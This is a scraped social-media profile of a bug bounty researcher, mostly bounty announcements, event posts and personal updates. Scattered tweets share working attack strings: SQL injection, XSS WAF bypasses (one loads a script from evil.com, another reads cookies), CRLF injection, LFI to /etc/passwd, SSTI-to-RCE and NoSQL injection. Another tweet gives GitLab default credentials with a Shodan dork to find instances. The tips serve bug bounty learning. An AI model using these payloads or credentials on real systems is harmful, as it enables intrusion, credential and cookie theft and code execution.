Youssef (s3c) Profile Banner
Youssef (s3c) Profile
Youssef (s3c)

@s3c_krd

Followers
9,076
Following
447
Media
86
Statuses
702

Muslim & Security researcher at hackerone & SRT member & Hackerone Ambassador #bugbounty #hacker #bugbounytips

Kurdistan
Joined December 2018
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@s3c_krd
Youssef (s3c)
1 month
I have found a new method for account takeover, almost all websites are vulnerable to it. #bugbounty
Tweet media one
59
71
990
@s3c_krd
Youssef (s3c)
10 months
SQL injection in one of the biggest shopping website in the world Payload: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR' #bugbountytips #BugBounty #infosec #Hackerone
Tweet media one
20
193
902
@s3c_krd
Youssef (s3c)
7 months
I found 1 click account takeover on TikTok even if you set 2FA on your account it will be bypassed with it😎 #bugbounty #infosec #hackerone
Tweet media one
40
45
822
@s3c_krd
Youssef (s3c)
1 year
Yay, I was awarded 12,500 for 1 click ATO on snapchat #BugBounty #hackerone #snapchat
Tweet media one
27
35
586
@s3c_krd
Youssef (s3c)
6 months
Yay, I was awarded a $25,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder #bugbounty
Tweet media one
40
21
534
@s3c_krd
Youssef (s3c)
2 years
Cloudflare bypassed !!! "-alert(0)-" >>blocked "-top['al\x65rt']('sailay')-" >>passed #bountytips #bugbountytips #BugBounty #infosec
18
158
492
@s3c_krd
Youssef (s3c)
9 months
I just spent 6 hours on a Cloudflare WAF and finally bypassed it, XSS without using parentheses and Backticks #XSS #BugBounty
Tweet media one
18
35
478
@s3c_krd
Youssef (s3c)
2 years
I am proud to be a part of it and top 1 ethical hacker on tiktok for 2022 #tiktok #cyberawareness #cybersecurity #BugBounty #infosec
Tweet media one
18
32
457
@s3c_krd
Youssef (s3c)
2 years
If you found a GitLab instance, try to login as root/admin with those credentials Username: root & pass: 5iveL!fe Username: admin & Pass: 5iveL!fe You can find it with shodan : org:"Target" http.title:"GitLab" #bugbountytip #BugBounty #infosec
17
161
447
@s3c_krd
Youssef (s3c)
1 year
Subdomain Finder Tool, easy way to find subdomains use it for FREE at #BugBounty #bugbountytips #subdomainfinder #infosec
Tweet media one
26
125
427
@s3c_krd
Youssef (s3c)
2 years
S3C - XSSer chrome extension as gift from 7$ month for free now Download Here #bugbountytips #bugbounty #xss #infosec
Tweet media one
21
116
374
@s3c_krd
Youssef (s3c)
1 year
Great Google Hacking Tool! for finding #XSS and open redirect vulnerability, use it for FREE at #bugbountytips #BugBounty #infosec
Tweet media one
17
116
376
@s3c_krd
Youssef (s3c)
5 months
Nailed my first @fbsecurity bounty! 🛡️💻 #BugBounty
Tweet media one
14
3
372
@s3c_krd
Youssef (s3c)
2 years
Yay, I was awarded a $5,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder
Tweet media one
17
14
368
@s3c_krd
Youssef (s3c)
9 months
Thank you bug bounty #BugBounty
Tweet media one
8
20
333
@s3c_krd
Youssef (s3c)
2 years
Akami WAF 403 bypassed Payload: <img src=x onerror= a=document;cc=a.createElement('script');cc.src='//evil.com/attack.js';a.querySelector('head').append(cc)> #XSS #bugbountytips #bugbounty #infosec #CyberSecurity
11
106
312
@s3c_krd
Youssef (s3c)
10 months
Always check X-Cache header in response headers if it was HIT you can chain your RXSS to SXSS #bugbountytips #bugbounty #infosec
Tweet media one
10
38
281
@s3c_krd
Youssef (s3c)
2 years
Local File Inclusion WAF (Cloudflare) bypass ✍️ ../../etc/passwd = 403 Forbidden ../../etc/random/../passwd = 200 OK #BugBounty #bugbountytips #infosec
6
78
276
@s3c_krd
Youssef (s3c)
1 year
Yay!, I was awarded $5k at @Hacker0x01 for accessing SMTP , database server and password also cloud lead to RCE via path traversal #bugbounty #bugbountytips #hackerone #infosec
Tweet media one
17
12
277
@s3c_krd
Youssef (s3c)
8 months
Finally I got hacking hackers badge with a critical vulnerability :) and hackerone will share more details about it to people as soon as possible #BugBounty #infosec
Tweet media one
Tweet media two
24
11
267
@s3c_krd
Youssef (s3c)
2 years
Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #BugBounty #bugbountytips #infosec
6
77
263
@s3c_krd
Youssef (s3c)
2 years
SSTI to RCE payload {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /home/min/user.txt")}} #BugBounty #bugbountytip #infosec #SSTI #RCE
4
83
258
@s3c_krd
Youssef (s3c)
2 years
Bypass final Payload Cloudflare <h1/%6f%6e/oNclicK=alert`hacked`>CLICK HERE #bugbounty #bugbountytips #infosec
6
81
249
@s3c_krd
Youssef (s3c)
3 years
Payload Https response splitting (CRLF) bypass >> (%E5%98%8A%E5%98%8D) usually it works on websites that use java in the backend. #bugbountytips #BugBounty #infosec #CyberSec
3
68
244
@s3c_krd
Youssef (s3c)
2 years
If you came across SSTI in a go application, it is worth trying the following payload {{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}} to achieve XSS and bypass HTML sanitization. #bugbounty #bugbountytips #infosec
7
68
227
@s3c_krd
Youssef (s3c)
6 months
Waiting for the bounty 😁 Bug type: Bypass Admin panel and access internal information #bugbountytip #bugbounty
Tweet media one
9
1
193
@s3c_krd
Youssef (s3c)
1 year
Yay, I was awarded a $12,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder
6
8
189
@s3c_krd
Youssef (s3c)
2 years
Payload bypass xss filter char () \"><iframe/src=javascript:alert%26%23x000000028%3b)> #bugbountytips #BugBounty #infosec
3
63
186
@s3c_krd
Youssef (s3c)
1 year
Finally reached all-time top 1 on TikTok #BugBounty #infosec #cybersecurity
Tweet media one
12
7
186
@s3c_krd
Youssef (s3c)
3 years
really it's not fun for me, some @Hacker0x01 trigger team don't care about reports without understand the report quickly close it as N/A or dups, i had 4 reports it was closed as dups and i talked with them to closer look at these reports and they was mistake it was not dups.
Tweet media one
Tweet media two
Tweet media three
21
10
182
@s3c_krd
Youssef (s3c)
11 months
Yay, I was awarded a $2,500 bounty on @Hacker0x01 for Hacking Hackerone :) #TogetherWeHitHarder #bugbounty #infosec #bugbountytips
Tweet media one
13
5
168
@s3c_krd
Youssef (s3c)
1 year
Turn 1hr working into 1min🫶🤯 #OpenAI #bugbounty #coding
Tweet media one
4
26
156
@s3c_krd
Youssef (s3c)
2 years
Payload Vulnerability CRLF to XSS %0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21-- #BugBounty #bugbountytips #infosec #hacking
3
63
153
@s3c_krd
Youssef (s3c)
1 year
New Great #Tool , open redirect #bypass with must power full bypasses it works for me most of the times, use it for FREE at #bugbountytips #bugbounty #infosec
Tweet media one
2
60
158
@s3c_krd
Youssef (s3c)
2 years
I am happy, I am invited to participate in h1-702! @Hacker0x01 live hacking event but due visa problems i will participate virtually #BugBounty #infosec
Tweet media one
Tweet media two
12
2
142
@s3c_krd
Youssef (s3c)
2 years
CVE-2022-29464 : Critical vulnerability on WSO2 discovered by @orange_8361
Tweet media one
0
49
130
@s3c_krd
Youssef (s3c)
6 months
TikTok and multiple companies have offered me a job based on my bug bounty experience. #BugBounty
@dccybersec
DC | David Lee
6 months
@sk1dd13 Been saying this for a while now dude. It's the most true statement ever. Some people think that bug bounties look great on a resume, but the truth is, recruiters don't give a flying shit about them. They don't consider it experience. Not my personal opinion. Just straight facts
14
1
20
4
1
129
@s3c_krd
Youssef (s3c)
7 months
XSS Using the <iframe> srcdoc Attribute: <iframe srcdoc="<script>alert('XSS')</script>"></iframe> #bugbountytips #bugbounty #infosec
2
15
126
@s3c_krd
Youssef (s3c)
1 year
Today is my birthday 🎂 🥳
Tweet media one
33
0
125
@s3c_krd
Youssef (s3c)
1 year
New achievement in 2023 💥 2023: 1 click ATO @Snapchat 🔥 2022: 1 click ATO @tiktok_us 2021: 1 click ATO @amazon and @ESEA 2020: 0 click ATO @Zoom 2019: 1 click ATO @unity #bugbountytips #togetherwehitharder #bugbounty
3
1
115
@s3c_krd
Youssef (s3c)
4 months
There are many secret bugs in bug bounties that no one has published yet😬 #bugbounty
7
0
111
@s3c_krd
Youssef (s3c)
1 year
1 sql injection duplicate and 1 RCE triaged :) #bugbountytips #BugBounty #hackerone
Tweet media one
Tweet media two
8
1
100
@s3c_krd
Youssef (s3c)
3 years
Thank you @Hacker0x01 for some cool swag at H1-2103 event.
Tweet media one
5
0
92
@s3c_krd
Youssef (s3c)
6 months
In October, I submitted 54 vulnerabilities to 44 programs on @Hacker0x01 . #TogetherWeHitHarder
5
1
89
@s3c_krd
Youssef (s3c)
2 years
@Hacker0x01 Why when iraq and Kurdistan and syria destroyed no one stand with them?!
8
3
91
@s3c_krd
Youssef (s3c)
27 days
Transparency of H1 Mediation💯 #BugBounty
Tweet media one
4
2
90
@s3c_krd
Youssef (s3c)
3 years
Today is birthday of prophet muhammad, congratulation to all muslims. #Quran #prophetmohammed
Tweet media one
5
5
79
@s3c_krd
Youssef (s3c)
5 months
Thanks to @Jayesh25_ and @Rhynorater for inspiring me to resend the report, and this time it got accepted internally. #bugbounty
Tweet media one
@s3c_krd
Youssef (s3c)
6 months
@ctbbpodcast reported it and closed as informative 🥲
3
0
2
6
2
80
@s3c_krd
Youssef (s3c)
4 months
In 2023, it was a fantastic year! I managed to find a one-click account takeover with the ability to bypass 2FA on Snapchat, and I found a critical vuln on HackerOne. In total, I submitted 65 reports through my part-time bug bounty efforts, earning a significant amount of $$$$
5
2
76
@s3c_krd
Youssef (s3c)
3 months
When you virtually participated in H1 LHE and reported a complex bug 😂(H1702) in 2022 #bugbounty
Tweet media one
1
1
75
@s3c_krd
Youssef (s3c)
2 years
3 months ago reported >> need more info >> self close >> today triaged as critical 😄 Bug type: sensitive information exposed #BugBounty #bugbountytips #hackerone
Tweet media one
1
0
74
@s3c_krd
Youssef (s3c)
1 month
I am pleased to announce that I am the new ambassador of Iraq at @Hacker0x01 . For all fellow hackers from Iraq, if you would like to join our team, please DM me.
@Hacker0x01
HackerOne
1 month
EMEA Pt. 1 @dee__see Ireland 🇮🇪 @rotembar Israel 🇮🇱 @val_brux Portugal 🇵🇹 @GreenJamSec U.K. 🇬🇧 @njcve_ U.K. 🇬🇧 @gregxsunday Poland 🇵🇱 @_lauritz_ Germany 🇩🇪 @s3c_krd Iraq 🇮🇶
9
2
35
11
3
72
@s3c_krd
Youssef (s3c)
1 year
Just in one week my tools have been used by 3.2k users, most of the users are form india and US. I hope it help you to find vulnerabilities. #XSS #LFI #RCE #SQLinjection #bugbountytips #BugBounty
Tweet media one
Tweet media two
1
18
72
@s3c_krd
Youssef (s3c)
1 year
Just spend 5 hours collaboration with @zhenwarx @moe1n1 @siratsami71 and found multiple bugs together #BugBounty #bugbountytip
Tweet media one
4
5
69
@s3c_krd
Youssef (s3c)
1 year
The best bug bounty program is @amazon when i was found a high bug on there service and i asked them to increase the bounty and they said when we updated the bounty table we will pay you double and they did it 😊 #BugBounty #bugbountytips
1
0
69
@s3c_krd
Youssef (s3c)
5 months
Is it good idea?! removed from 7 program due to new country restrictions. #bugbounty #hackerone
Tweet media one
12
1
70
@s3c_krd
Youssef (s3c)
1 month
@mehrab_opi33500 I will share it when completed my research
6
0
68
@s3c_krd
Youssef (s3c)
2 years
i am happy to announce that i have joined @synack as @SynackRedTeam member.
Tweet media one
7
0
67
@s3c_krd
Youssef (s3c)
2 years
Tweet media one
2
1
68
@s3c_krd
Youssef (s3c)
2 years
The result when a collaborator disclose your method #bugbountytips #bugbounty #infosec
Tweet media one
6
4
67
@s3c_krd
Youssef (s3c)
2 years
CSRF bypass TIP - If a protection based origin check and null origin allowed try send the request via data protocol it will send null origin Example: data:text/html;base64,….. #bugbountytips #bugsbunny #infosec
2
21
66
@s3c_krd
Youssef (s3c)
2 years
Tweet media one
4
3
64
@s3c_krd
Youssef (s3c)
2 months
Tweet media one
5
1
65
@s3c_krd
Youssef (s3c)
2 years
Tweet media one
1
1
63
@s3c_krd
Youssef (s3c)
2 years
S3c xsser - For finding GET/POST method XSS without WAF detect it 1-month 7$ 2-month 12$ 3-month 18$ contact to buy s3c @wearehackerone .com Demo #bugbountytips #infosec #bugbounty #xss
1
20
59
@s3c_krd
Youssef (s3c)
2 years
Some BB program trigger in @Hacker0x01 doesn’t know what’s security bug and what’s not #BugBounty #infosec
6
3
55
@s3c_krd
Youssef (s3c)
3 years
Tweet media one
1
2
56
@s3c_krd
Youssef (s3c)
3 years
The article about How i hacked world wide Zoom users for who didn’t read it. #bugbountytips #bugbounty #zoom #infosec $zm #CyberSecurity
Tweet media one
2
15
48
@s3c_krd
Youssef (s3c)
2 years
3 billion users with single line of code got hacked #log4j
1
3
47
@s3c_krd
Youssef (s3c)
10 days
Tweet media one
Tweet media two
Tweet media three
1
1
45
@s3c_krd
Youssef (s3c)
9 months
If you have a case block JavaScript:.* () ‘ DM for collaboration because if I share it with the public it will be fixed
12
0
43
@s3c_krd
Youssef (s3c)
3 months
Snowy adventures with the best crew! ❄️🏔️ @moe1n1 @siratsami71 @zhenwarx
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
2
39
@s3c_krd
Youssef (s3c)
2 years
Social engineering out of scope #uber #BugBounty
Tweet media one
4
5
37
@s3c_krd
Youssef (s3c)
2 years
Tweet media one
7
0
36
@s3c_krd
Youssef (s3c)
8 days
I learnt many good stuffs with @ptsecurity at @GISECGlobal ! #GISEC2024
1
1
38
@s3c_krd
Youssef (s3c)
3 months
In January, I submitted 19 vulnerabilities to 18 programs on @Hacker0x01 . #TogetherWeHitHarder
0
0
35
@s3c_krd
Youssef (s3c)
2 years
Tweet media one
2
0
34
@s3c_krd
Youssef (s3c)
1 year
It was mongodb injection >> payloads list[][$lt]=0 => FALSE List[][$in][]=patch => TRUE List[][$nin][]=patch => FALSE List[][$lt]=0 => FALSE #bugbountytips
3
2
34
@s3c_krd
Youssef (s3c)
8 months
❤️❤️✌️✌️💚💚 #Kurdistan
Tweet media one
3
0
32
@s3c_krd
Youssef (s3c)
1 year
Eid Mubarak
Tweet media one
0
0
27
@s3c_krd
Youssef (s3c)
2 months
Tweet media one
1
0
27
@s3c_krd
Youssef (s3c)
2 years
Rank 7 ✌️🔥
@Hacker0x01
HackerOne
2 years
It's the final push of #H1702 ! Follow along with the Day 3 leaderboard all day to see who is making their way to the top. 👀
Tweet media one
4
10
80
2
0
25
@s3c_krd
Youssef (s3c)
3 months
GPT4😍
Tweet media one
Tweet media two
0
0
21
@s3c_krd
Youssef (s3c)
1 year
Kurdish bug bounty community at telegram join us and share tips with each other #BugBounty #bugbountytips #kurdishbugbounty
4
0
21
@s3c_krd
Youssef (s3c)
9 days
The ATM machine hacking was a great presentation✌️, glad to meet such a creative and smart team
Tweet media one
Tweet media two
@ptswarm
PT SWARM
10 days
🏜️ We're live at #GISEC2024 in Dubai, UAE! Join PT SWARM for a master class on soldering your smart 🥤 opener or enjoy our ATM hacking contest! 📠 Catch us until April 25 at 5 PM! 🇦🇪
Tweet media one
3
6
24
0
0
21
@s3c_krd
Youssef (s3c)
2 years
Big scope , hard target @Hacker0x01 #h1702
1
0
21
@s3c_krd
Youssef (s3c)
5 months
Savoring a splendid vacation in Dubai with @zhenwarx and @moe1n1
6
0
20
@s3c_krd
Youssef (s3c)
12 days
Excited to be attending @GISECGlobal cybersecurity conference! If you're here too and want to connect, let me know. Would love to meet fellow cybersecurity enthusiasts and exchange ideas! #GISEC #Cybersecurity #BugBounty #infosec
1
1
20
@s3c_krd
Youssef (s3c)
1 year
I hope @Hacker0x01 add @okx for payment methods instead coinbase because our accounts stopped in coinbase without any reason, @jobertabma @martenmickos
@CoinbaseSupport
Coinbase Support
1 year
As the most trusted and secure crypto platform, we regularly monitor our systems and actively manage our product to provide the best user experience. In the course of a recent routine review of our systems, we identified some accounts that no longer meet our updated standards.
118
21
103
5
0
20
@s3c_krd
Youssef (s3c)
7 months
@Shajjad10853937 Thank you, I think if TikTok haram and other social media apps haram too because all have bad and good content and it depends on the person what they are sharing there are lots of useful accounts using TikTok for good and sharing the Quran and useful content, and for bad too
1
0
19
@s3c_krd
Youssef (s3c)
3 years
A picture of my city #Erbil in H1-2103 💕 #bugbounty #infosec #hacker0x01
Tweet media one
3
0
18
@s3c_krd
Youssef (s3c)
6 months
@fransrosen Critical IDOR on hackerone
Tweet media one
3
0
17